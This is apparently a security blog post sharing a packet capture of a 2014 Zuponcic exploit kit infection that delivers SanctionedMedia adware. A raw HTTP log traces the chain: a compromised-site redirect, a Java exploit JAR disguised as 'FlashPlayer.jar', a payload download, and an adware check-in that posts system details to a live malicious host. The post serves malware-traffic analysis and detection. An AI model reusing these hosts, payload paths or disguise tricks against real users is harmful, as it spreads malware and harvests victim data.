RARE Zuponcic Exploit Kit Traffic Sample Devlivers Adware:SanctionedMedia PCAP Download

By | January 29, 2016

Download this rare PCAP : zuponcic

 

Adware:MSIL/SanctionedMedia is a specific detection used by Microsoft Security Essentials,Windows Defender and other antivirus products to indicate and detect a Potentially Unwanted Program.
A potentially unwanted application is a program that contains adware, installs toolbars or has other unclear objectives.

Adware:MSIL/SanctionedMedia it’s technically not a virus, but it does exhibit plenty of malicious traits, such as rootkit capabilities to hook deep into the operating system, browser hijacking, and in general just interfering with the user experience. The industry generally refers to it as a “PUP,” or potentially unwanted program.
The Adware:MSIL/SanctionedMedia infection is used to boost advertising revenue, as in the use of blackhat SEO, to inflate a site’s page ranking in search results.

2014-03-16 22:05:05.594513 IP 192.168.204.188.49281 > 217.76.156.117.80: Flags [P.], seq 1:574, ack 1, win 64240, length 573: HTTP: GET / HTTP/1.1
E..e..@……….L.u…P……n”P….’..GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=www.silvergrey.es%2F&qs=n&form=QBLH&pq=www.silvergrey.es%2F&sc=0-0&sp=-1&sk=&cvid=538afc1b16b24ba791270c30b296cdd8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.silvergrey.es
Connection: Keep-Alive
2014-03-16 22:05:05.594574 IP 217.76.156.117.80 > 192.168.204.188.49281: Flags [.], ack 574, win 64240, length 0
E..(……$..L.u…..P….n”…\P………….
2014-03-16 22:05:05.772439 IP 217.76.156.117.80 > 192.168.204.188.49281: Flags [FP.], seq 1:939, ack 574, win 64240, length 938: HTTP: HTTP/1.1 302 Found
E……… ].L.u…..P….n”…\P…….HTTP/1.1 302 Found
Date: Mon, 17 Mar 2014 03:05:05 GMT
Server: Apache
Set-Cookie: xpH=05; path=/; domain=www.silvergrey.es; expires=Mon, 24-Mar-2014 15:18:05 GMT
Location: http://ambalanchery.drdekloet.com/delivery/lg.php?bannerid=23350&campaignid=4402&zoneid=272&channel_ids=,&loc=http%3A%2F%2Fwww.silvergrey.es%2F&referer=http%3A%2F%2Fwww.silvergrey.es%2F&cb=bcaeb92e71
Content-Length: 474
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href=”http://ambalanchery.drdekloet.com/delivery/lg.php?bannerid=23350&amp;campaignid=4402&amp;zoneid=272&amp;channel_ids=,&amp;loc=http%3A%2F%2Fwww.silvergrey.es%2F&amp;referer=http%3A%2F%2Fwww.silvergrey.es%2F&amp;cb=bcaeb92e71″>here</a>.</p>
<hr>
<address>Apache Server at www.silvergrey.es Port 80</address>
</body></html>

2014-03-16 22:05:06.114625 IP 192.168.204.188.49282 > 31.210.96.157.80: Flags [P.], seq 1:748, ack 1, win 64240, length 747: HTTP: GET /delivery/lg.php?bannerid=23350&campaignid=4402&zoneid=272&channel_ids=,&loc=http%3A%2F%2Fwww.silvergrey.es%2F&referer=http%3A%2F%2Fwww.silvergrey.es%2F&cb=bcaeb92e71 HTTP/1.1
E…..@….^……`….PHmt.Qo>DP…….GET /delivery/lg.php?bannerid=23350&campaignid=4402&zoneid=272&channel_ids=,&loc=http%3A%2F%2Fwww.silvergrey.es%2F&referer=http%3A%2F%2Fwww.silvergrey.es%2F&cb=bcaeb92e71 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=www.silvergrey.es%2F&qs=n&form=QBLH&pq=www.silvergrey.es%2F&sc=0-0&sp=-1&sk=&cvid=538afc1b16b24ba791270c30b296cdd8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ambalanchery.drdekloet.com
2014-03-16 22:05:06.114630 IP 31.210.96.157.80 > 192.168.204.188.49282: Flags [.], ack 748, win 64240, length 0
E..(…….V..`……P..Qo>DHmw.P….W……..
2014-03-16 22:05:06.743853 IP 31.210.96.157.80 > 192.168.204.188.49282: Flags [P.], seq 1:356, ack 748, win 64240, length 355: HTTP: HTTP/1.1 302 Moved Temporarily
E………….`……P..Qo>DHmw.P…….HTTP/1.1 302 Moved Temporarily
Server: nginx/1.1.4
Date: Mon, 17 Mar 2014 03:05:06 GMT
Content-Type: text/html
Content-Length: 160
Connection: close
Location: http://ga.instylecuts.net/

<html>
<head><title>302 Found</title></head>
<body bgcolor=”white”>
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.1.4</center>
</body>

2014-03-16 22:05:07.010773 IP 192.168.204.188.49283 > 178.33.192.35.80: Flags [P.], seq 1:575, ack 1, win 64240, length 574: HTTP: GET / HTTP/1.1
E..f..@…./…..!.#…P…`..n.P….s..GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=www.silvergrey.es%2F&qs=n&form=QBLH&pq=www.silvergrey.es%2F&sc=0-0&sp=-1&sk=&cvid=538afc1b16b24ba791270c30b296cdd8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ga.instylecuts.net
2014-03-16 22:05:07.010805 IP 178.33.192.35.80 > 192.168.204.188.49283: Flags [.], ack 575, win 64240, length 0
E..(……’y.!.#…..P….n…..P…F$……..
2014-03-16 22:05:07.212855 IP 178.33.192.35.80 > 192.168.204.188.49283: Flags [P.], seq 1:1461, ack 575, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………!..!.#…..P….n…..P….l..HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:07 GMT
Content-Type: text/html
Content-Length: 2988
Connection: close
Set-Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

2014-03-16 22:05:07.373801 IP 192.168.204.188.49285 > 178.33.192.35.80: Flags [P.], seq 1:403, ack 1, win 64240, length 402: HTTP: GET /js/java.js HTTP/1.1
E…..@……….!.#…P..JT[f..P…h&..GET /js/java.js HTTP/1.1
Accept: */*
Referer: http://ga.instylecuts.net/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: ga.instylecuts.net
Connection: Keep-Alive
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3
2014-03-16 22:05:07.373940 IP 178.33.192.35.80 > 192.168.204.188.49285: Flags [.], ack 403, win 64240, length 0
E..(……’r.!.#…..P..[f….K.P…re……..
2014-03-16 22:05:07.459015 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,……’m.!.#…..P..@…:.8h`…’………
2014-03-16 22:05:07.515638 IP 178.33.192.35.80 > 192.168.204.188.49285: Flags [P.], seq 1:299, ack 403, win 64240, length 298: HTTP: HTTP/1.1 200 OK
E..R……&F.!.#…..P..[f….K.P…vm..HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:07 GMT
Content-Type: application/javascript
Content-Length: 16795
Last-Modified: Thu, 12 May 2011 16:14:28 GMT
Connection: close
ETag: “4dcc0764-419b”
Expires: Wed, 16 Apr 2014 03:05:07 GMT
Cache-Control: max-age=2592000

2014-03-16 22:05:07.836923 IP 192.168.204.188.49286 > 178.33.192.35.80: Flags [P.], seq 1:399, ack 1, win 64240, length 398: HTTP: GET /tr.gif HTTP/1.1
E…..@……….!.#…P.0.;.a..P…….GET /tr.gif HTTP/1.1
Accept: */*
Referer: http://ga.instylecuts.net/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: ga.instylecuts.net
Connection: Keep-Alive
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3
2014-03-16 22:05:07.836927 IP 178.33.192.35.80 > 192.168.204.188.49286: Flags [.], ack 399, win 64240, length 0
E..(……’^.!.#…..P…a…0..P….3……..
2014-03-16 22:05:07.858983 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,……’Y.!.#…..P..@…:.8h`…’………
2014-03-16 22:05:07.959033 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,……’X.!.#…..P..@…:.8h`…’………
2014-03-16 22:05:07.972818 IP 178.33.192.35.80 > 192.168.204.188.49286: Flags [P.], seq 1:281, ack 399, win 64240, length 280: HTTP: HTTP/1.1 200 OK
E..@……&C.!.#…..P…a…0..P…@…HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:08 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Sat, 24 Sep 2011 20:51:54 GMT
Connection: close
ETag: “4e7e42ea-2b”
Expires: Wed, 16 Apr 2014 03:05:08 GMT
Cache-Control: max-age=2592000

2014-03-16 22:05:08.137718 IP 192.168.204.188.49287 > 178.33.192.35.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342: HTTP: GET /favicon.ico HTTP/1.1
E..~..@……….!.#…P..v.bO_.P….o..GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ga.instylecuts.net
Connection: Keep-Alive
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3
2014-03-16 22:05:08.137750 IP 178.33.192.35.80 > 192.168.204.188.49287: Flags [.], ack 343, win 64240, length 0
E..(……’V.!.#…..P..bO_…w]P………….
2014-03-16 22:05:08.158908 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,……’Q.!.#…..P..@…:.8h`…’………
2014-03-16 22:05:08.258923 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,……’P.!.#…..P..@…:.8h`…’………
2014-03-16 22:05:08.268114 IP 178.33.192.35.80 > 192.168.204.188.49287: Flags [FP.], seq 1:352, ack 343, win 64240, length 351: HTTP: HTTP/1.1 302 Moved Temporarily
E………%..!.#…..P..bO_…w]P…w…HTTP/1.1 302 Moved Temporarily
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:08 GMT
Content-Type: text/html
Content-Length: 160
Connection: close
Location: http://www.google.com/

<html>
<head><title>302 Found</title></head>
<body bgcolor=”white”>
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.5.8</center>
</body>
</html>

2014-03-16 22:05:18.569718 IP 192.168.204.188.49289 > 178.33.192.35.80: Flags [P.], seq 1:322, ack 1, win 64240, length 321: HTTP: GET /SnaorNJ.jar HTTP/1.1
E..i..@……….!.#…P.K”C6.z.P…….GET /SnaorNJ.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: ga.instylecuts.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3
2014-03-16 22:05:18.569874 IP 178.33.192.35.80 > 192.168.204.188.49289: Flags [.], ack 322, win 64240, length 0
E..(.Z….&..!.#…..P..6.z..K#.P………….
2014-03-16 22:05:18.667151 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,.[….&..!.#…..P..@…:.8h`…’………
2014-03-16 22:05:18.743966 IP 178.33.192.35.80 > 192.168.204.188.49289: Flags [P.], seq 1:392, ack 322, win 64240, length 391: HTTP: HTTP/1.1 200 OK
E….\….%C.!.#…..P..6.z..K#.P…IR..HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:18 GMT
Content-Type: application/java-archive
Content-Length: 5626
Last-Modified: Mon, 17 Mar 2014 02:02:12 GMT
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: post-check=0, pre-check=0
Accept-Ranges: none
Content-Disposition: attachment; filename=”FlashPlayer.jar”
ETag: “532657a4-15fa”

2014-03-16 22:05:24.990170 IP 192.168.204.188.49290 > 178.33.192.35.80: Flags [P.], seq 1:302, ack 1, win 64240, length 301: HTTP: POST / HTTP/1.1
E..U..@……….!.#…P=a.7..TYP….e..POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: ga.instylecuts.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 94
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3
2014-03-16 22:05:24.990331 IP 178.33.192.35.80 > 192.168.204.188.49290: Flags [.], ack 302, win 64240, length 0
E..(……&..!.#…..P….TY=a.dP…e………
2014-03-16 22:05:24.990535 IP 192.168.204.188.49290 > 178.33.192.35.80: Flags [P.], seq 302:396, ack 1, win 64240, length 94: HTTP
E…..@……….!.#…P=a.d..TYP…….i=2ZIgfqzM5aq0q42DyFMy+pi1pw8EAnVgH1SZB+JYLAbQImahf0miQkAsFa3R1QE78IJH3yVQJY/73V2tfkvF1MFMaKQ=
2014-03-16 22:05:24.990591 IP 178.33.192.35.80 > 192.168.204.188.49290: Flags [.], ack 396, win 64240, length 0
E..(……&..!.#…..P….TY=a..P…e2……..
2014-03-16 22:05:25.068400 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,……&}.!.#…..P..@…:.8h`…’………
2014-03-16 22:05:25.168479 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,……&|.!.#…..P..@…:.8h`…’………
2014-03-16 22:05:25.268356 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,……&{.!.#…..P..@…:.8h`…’………
2014-03-16 22:05:25.324410 IP 178.33.192.35.80 > 192.168.204.188.49290: Flags [P.], seq 1:1461, ack 396, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……… ..!.#…..P….TY=a..P…/e..HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:25 GMT
Content-Type: application/octet-stream
Content-Length: 1270448
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: post-check=0, pre-check=0
Accept-Ranges: none
Content-Disposition: attachment; filename=”rnosqj”
Last-Modified: Mon, 17 Mar 2014 03:05:25 GMT
ETag: W/”160a10-1362b0-4f4c4b0dec740″
Accept-Ranges: bytes

2014-03-16 22:05:34.521812 IP 192.168.204.188.49291 > 93.115.88.220.80: Flags [P.], seq 1:953, ack 1, win 64240, length 952: HTTP: GET /redir/article/home HTTP/1.1
E… .@………]sX….P……y.P…….GET /redir/article/home HTTP/1.1
Cache-Control: no-cache
Connection: Close
Pragma: no-cache
Accept: */*
Cookie: articles-visitor=ft-WpE0bemg9f47XnQR0iKHr1w_ZSuiDJU2YcCpqrH7FygLYKESPhrz4j7Gvx1HFgMwoBx7S2Ww7bH_WKDsmpIbErxGzJOJzmkYPPQFXp52o5tJ_j_iL8kxThQFo0xWNRBNHBQLhl_F7qkVJR3oPKdxtwdTYzyiZc8OYyHy7SDybUMigS2TZOeQ5AzQ_iPqWuVaEcmvurIgOeZLN11B-weBb5bRjeLZ0A4ZR2AUvHe-qN4qCd5M3sftXHaA9bN4F3lPWmtEafTXgkRGku6TOwdB8kgFMYwgVFsYG0hNAkIyIN6KCeBdZOMFhfSnJRmjGpKP01aGJJloQyahKE_M44KydHs11AogBqibckht8paOZEfLd91zjOFtX48CIpIRXJNrMgF9eIZMWOIT9_x7BjJXOjObOsJtQES2eQvL2bSaeNHihBU0CQGDo4GUN528EAsj5a7AMBczEeZ10-iDZgAks6D-6jIOw95-mXhpe0zvG2ir6yBkAiW4YDr1dccsT7ktGy-mt_GzUd5ICzC7U2qyxYv7dGH7u_vENxgNDYZLHxHnl7LjEbH1; m-b=tz=ep2zatqWQv-QwRM45Y167oU1cEAbKW6hlZFsqgR1m3waK
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 93.115.88.220
2014-03-16 22:05:34.521857 IP 93.115.88.220.80 > 192.168.204.188.49291: Flags [.], ack 953, win 64240, length 0
E..(.z……]sX……P….y….DP…p………
2014-03-16 22:05:34.567093 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,.{….”..!.#…..P..@…:.8h`…’………
2014-03-16 22:05:34.667130 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
E..,.|….”..!.#…..P..@…:.8h`…’………
2014-03-16 22:05:34.761558 IP 93.115.88.220.80 > 192.168.204.188.49291: Flags [FP.], seq 1:388, ack 953, win 64240, length 387: HTTP: HTTP/1.1 404 Not Found
E….}……]sX……P….y….DP…….HTTP/1.1 404 Not Found
Server: Apache/1.3.42
Date: Mon, 17 Mar 2014 03:05:35 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 216
Connection: close

<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /redir/article/home was not found on this server.</p>
</body></html>

2014-03-16 22:05:41.082418 IP 192.168.204.188.49293 > 66.254.123.33.80: Flags [P.], seq 1:141, ack 1, win 64240, length 140: HTTP: GET /version2.XML HTTP/1.1
E… .@………B.{!…P….d.{.P…….GET /version2.XML HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; SMAD 9.9.9.9; )
Host: www.sanctionedmedia.com
Connection: Keep-Alive
2014-03-16 22:05:41.082499 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [.], ack 141, win 64240, length 0
E..(……..B.{!…..P..d.{….mP………….
2014-03-16 22:05:41.163656 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 1:396, ack 141, win 64240, length 395: HTTP: HTTP/1.1 200 OK
E………..B.{!…..P..d.{….mP…D…HTTP/1.1 200 OK
Server: nginx/1.0.14
Date: Mon, 17 Mar 2014 03:05:41 GMT
Content-Type: application/xml
Connection: keep-alive
Last-Modified: Tue, 24 Jan 2012 05:04:40 GMT
ETag: “2415ba-8c-4b73f1598ca00″
Accept-Ranges: bytes
Content-Length: 140

<?xml version=”1.0″ encoding=”utf-8”?>
<Smad>
<version>1.0.0.0</version>
<url>http://www.SanctionedMedia.com/prot54.exe</url>
</Smad>

2014-03-16 22:05:41.263430 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 1:396, ack 141, win 64240, length 395: HTTP: HTTP/1.1 200 OK
E………..B.{!…..P..d.{….mP…D…HTTP/1.1 200 OK
Server: nginx/1.0.14
Date: Mon, 17 Mar 2014 03:05:41 GMT
Content-Type: application/xml
Connection: keep-alive
Last-Modified: Tue, 24 Jan 2012 05:04:40 GMT
ETag: “2415ba-8c-4b73f1598ca00″
Accept-Ranges: bytes
Content-Length: 140

<?xml version=”1.0″ encoding=”utf-8”?>
<Smad>
<version>1.0.0.0</version>
<url>http://www.SanctionedMedia.com/prot54.exe</url>
</Smad>

 

2014-03-16 22:05:46.513639 IP 192.168.204.188.49293 > 66.254.123.33.80: Flags [P.], seq 141:349, ack 396, win 63845, length 208: HTTP: POST /smfeed2.php HTTP/1.1
E… .@………B.{!…P…md.|.P..e.U..POST /smfeed2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; SMAD 9.9.9.9; )
Host: www.sanctionedmedia.com
Content-Length: 197
Expect: 100-continue
2014-03-16 22:05:46.513659 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [.], ack 349, win 64240, length 0
E..(……..B.{!…..P..d.|….=P………….
2014-03-16 22:05:46.591443 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 396:421, ack 349, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
E..A……..B.{!…..P..d.|….=P….k..HTTP/1.1 100 Continue
2014-03-16 22:05:46.591829 IP 192.168.204.188.49293 > 66.254.123.33.80: Flags [P.], seq 349:546, ack 421, win 63820, length 197: HTTP
E… .@………B.{!…P…=d.|.P..L …uid=&pid=&ver=5.0.0.0&ua=Internet+Explorer+8.00.7600.16385&os=Windows+7+Home+Premium+Service+Pack+1+64-bit&url=http%3a%2f%2fga.instylecuts.net%2f&title=www.silvergrey.es+-+Windows+Internet+Explorer
2014-03-16 22:05:46.591899 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [.], ack 546, win 64240, length 0
E..(……..B.{!…..P..d.|…..P………….
2014-03-16 22:05:46.669833 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 421:631, ack 546, win 64240, length 210: HTTP: HTTP/1.1 200 OK
E………..B.{!…..P..d.|…..P….!..HTTP/1.1 200 OK
Server: nginx/1.0.14
Date: Mon, 17 Mar 2014 03:05:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 14

nothing to pop
2014-03-16 22:05:46.769726 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 421:631, ack 546, win 64240, length 210: HTTP: HTTP/1.1 200 OK
E………..B.{!…..P..d.|…..P….!..HTTP/1.1 200 OK
Server: nginx/1.0.14
Date: Mon, 17 Mar 2014 03:05:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 14

nothing to pop

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *